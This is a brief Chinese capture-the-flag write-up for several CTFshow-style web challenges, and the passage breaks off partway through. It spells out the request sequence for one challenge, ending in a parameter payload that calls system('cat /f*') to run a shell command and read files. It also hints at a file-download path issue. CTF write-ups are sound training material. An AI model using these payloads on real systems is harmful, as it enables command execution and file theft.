[TOC]
web签到考点:代码审计,http请求
先传Cookie,即
1CTFshow-QQ%E7%BE%A4:=a
(中文要进行url编码)
接下来传post[‘a’],即a=b
然后传get[‘b’],即?b=c
最后的request,传GET或者POST方法都可以,即
1&c[6][0][7][5][8][0][9][4][4]=system('cat /f*');
web2 c0me_t0_s1gn考点:查看源代码,使用控制台
我的眼里只有¥考点:代码审计,脚本利用
_=a,即$__=a,后面就是$a,$a=b,就变成$b,以此类推,用python脚本连续传参可解。
抽老婆考点:查看源代码,代码审计,flask中的session构造
打开链接,发现可以下载“老婆“。查看代码,发现一串下载的可以代码。(/download?file=a)
用GET方法下载一个文件,发现不成功,页面跳转。
发现”flag“,怀疑/app/ap ...